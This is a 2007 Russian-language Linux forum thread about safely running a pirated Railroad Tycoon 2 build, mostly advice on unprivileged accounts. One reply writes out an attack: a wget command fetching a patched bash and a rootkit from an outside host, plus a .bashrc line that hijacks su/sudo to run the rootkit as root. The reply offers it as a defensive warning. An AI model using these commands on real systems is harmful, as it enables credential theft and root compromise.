Форум — Talks Как уберечься? 0 0 Слил с торрентов давнюю мечту - railroad tycoon 2 под linux. Но запускать стремно - вспоминается строка на перл. Как правильно запустить игру, чтобы она ничего лишнего не наделала? Думаю, местные гуру помогут Ссылка
Если сильно беспокоишься - создай юзера с полным отсутствием прав и играй только от его имени. sin_a ★★★★★ (15.06.07 22:21:25 MSK) Показать ответ Ссылка
Ответ на: комментарий от sin_a 15.06.07 22:21:25 MSK обычно для этих целей уже есть пользователь games, см. /etc/passwd dima3351 ★ (15.06.07 23:25:23 MSK) Показать ответ Ссылка
Ответ на: комментарий от dima3351 15.06.07 23:25:23 MSK >обычно для этих целей уже есть пользователь games, см. /etc/passwd Вообще-то этому пользователю принадлежит куча файлов, и данная подозрительная программа может подменить их. true (15.06.07 23:32:43 MSK) Ссылка
Ответ на: комментарий от Vanilin 16.06.07 00:13:00 MSK >И вообще - не сиди под рутом... Для того, чтобы снести систему, достаточно иметь доступ к аккаунту, из-под которого делают su/sudo... true (16.06.07 00:15:28 MSK) Показать ответ Ссылка
По сабжу - презерватив руледъ. по игрушкам - пиши их сам, и пусть скачивающие бояцо! bugmaker ★★★★☆ (16.06.07 00:22:41 MSK) Показать ответ Ссылка
Ответ на: комментарий от bugmaker 16.06.07 00:22:41 MSK >По сабжу - презерватив руледъ. +1 Безопасный секс наше фсио :) furs ★ (16.06.07 00:54:41 MSK) Ссылка
Ответ на: комментарий от true 16.06.07 00:15:28 MSK Если настроишь так, чтобы оно пароль просило, то недостаточно. ;) helicopter (16.06.07 02:21:41 MSK) Показать ответ Ссылка
Ответ на: комментарий от helicopter 16.06.07 02:21:41 MSK >Если настроишь так, чтобы оно пароль просило, то недостаточно. ;) Очень даже достаточно. Один из способов - тебе на компьютер закидывается пропатченный bash и rootkit: cd /tmp; wget http://rootkit.narod.ru/bash http://rootkit.narod.ru/rootkit; chmod +x bash rootkit В .bashrc прописывается: if [ $0 != /tmp/bash ]; then exec /tmp/bash; fi Когда ты наберешь su, пропатченный bash выполнит команду: su -c '/tmp/rootkit & bash' И пароль ты введешь именно для этой команды. :) То же самое касается sudo и ssh. true (16.06.07 12:48:16 MSK) Показать ответ Ссылка
Ответ на: комментарий от true 16.06.07 12:48:16 MSK хм.... большой опыт таких проделок? сколько из них были успешными? DemonZLa ★ (16.06.07 20:54:12 MSK) Показать ответ Ссылка
Ответ на: комментарий от DemonZLa 16.06.07 20:54:12 MSK Практически не использовал, но для безопасности неплохо бы учитывать, что и такое возможно. true (16.06.07 21:17:34 MSK) Ссылка